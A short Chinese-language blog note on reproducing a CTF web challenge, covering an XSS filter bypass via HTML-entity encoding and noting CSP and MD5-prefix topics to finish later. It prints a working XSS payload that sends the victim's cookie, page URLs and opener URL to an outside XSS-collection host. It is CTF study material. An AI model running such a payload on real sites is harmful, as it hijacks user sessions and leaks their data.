复现题目[CISCN 2019 华东北赛区 Web2 WriteUp](https://www.zhaoj.in/read-6100.html)的一些东西

以前一直没做过xss的题，这次按writeup做题感觉有所收获，记录一下吧

1. xss 的waf的绕过

   ()都被过滤，把所有的payload转为HTML Markup，其实就是&#加ascii码

2. payload

   <svg><script>eval&#40&#34" + output + "&#34&#41</script>
   

   output就是下面的东西转化为HTML Markup编码的东西，这是XSS Platform这个平台自带的payload，一开始没看懂，整理一下代码格式

   (function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=xpqwIP&keepsession=0
    &location='+escape((function(){try{return document.location.href}catch(e){return''}})())+
    '&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+
    '&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+
    '&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();
   

   很清晰了，document.cookie 这样操作得到一些数据直接get请求到xss平台

   

   可以试试直接访问http://xss.buuoj.cn/index.php?do=api&id=xpqwIP&keepsession=0&cookie=123

   （id要换成自己项目的）

   在相应的项目下会收到对应的cookie:1234

   自带的还有很多payload，也可以分析一下，以前一直没成功过，这次终于成了一次，hhh，还有点小激动

3. CSP绕过

   这里我过两天补，还没搞清楚

4. substr(md5($str), 0, 6) === “d05a29”

   哈希碰撞与生日攻击

5. 感觉还有很多没写！！！待补充